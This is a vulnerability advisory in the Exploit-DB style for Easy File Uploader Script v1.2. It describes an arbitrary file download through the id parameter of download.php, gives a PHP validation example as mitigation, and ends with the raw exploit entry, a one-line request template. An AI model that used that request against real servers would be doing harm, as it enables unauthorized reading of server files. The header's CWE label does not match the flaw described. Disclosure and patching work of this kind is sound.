vendor: Easy File Uploader Script
by: Ihsan Sencan
CVSS: 8.8 HIGH
Arbitrary File Download
CWE: 434
Product Name: Easy File Uploader Script
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE: N/A
CPE: a:nelliwinne:easy_file_uploader_script:1.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
2017

Easy File Uploader Script v1.2 – Arbitrary File Download

A vulnerability in Easy File Uploader Script v1.2 allows an attacker to download arbitrary files from the server. The download.php script does not properly validate the id parameter, so a request is not limited to the files the application is meant to serve.

Mitigation:

Validate the id parameter in the download.php script to ensure that only authorized files can be downloaded.
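
One way to apply this mitigation, shown as an added example (not the vendor's code and not part of the original advisory). UPLOAD_DIR, resolve_download() and the accepted file-name pattern are assumptions about how uploads are stored.

```php
<?php
declare(strict_types=1);

// Assumption: all uploads live in one directory outside the web root.
const UPLOAD_DIR = '/var/www/efu-uploads';   // hypothetical path

/**
 * Map the untrusted id to a regular file inside $baseDir, or return null.
 */
function resolve_download(string $id, string $baseDir): ?string
{
    // Accept a bare file name only: no separators, no NUL byte, no leading dot.
    if (!preg_match('/\A[A-Za-z0-9_][A-Za-z0-9._-]{0,127}\z/', $id)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $id);
    if ($base === false || $path === false) {
        return null;                         // missing directory or file
    }
    // realpath() resolves symlinks and "..", so a prefix check on the
    // canonical path confirms the file really is inside the upload directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

$id   = $_GET['id'] ?? '';                   // may be an array, so check the type
$path = is_string($id) ? resolve_download($id, UPLOAD_DIR) : null;
if ($path === null) {
    http_response_code(404);                 // same response for every rejection
    exit;
}
// If files are private, a per-user ownership check belongs here (not shown).
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $id . '"');
header('X-Content-Type-Options: nosniff');
header('Content-Length: ' . (string) filesize($path));
readfile($path);
```

Where the application keeps a record of uploads, looking the id up in that record and serving only the stored path is stricter than validating a file name.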

Exploit-DB raw data:

# # # # # 
# Exploit Title: Easy File Uploader Script v1.2 - Arbitrary File Download
# Google Dork: N/A
# Date: 07.02.2017
# Vendor Homepage: http://nelliwinne.net/
# Software Buy: https://codecanyon.net/item/easy-file-uploader-php-multiple-uploader-with-file-manager/17222287
# Demo: http://demos.nelliwinne.net/EasyFileUploader/
# Version: 1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# Exploit :
# http://localhost/[PATH]/download.php?id=[FILE]
# # # # #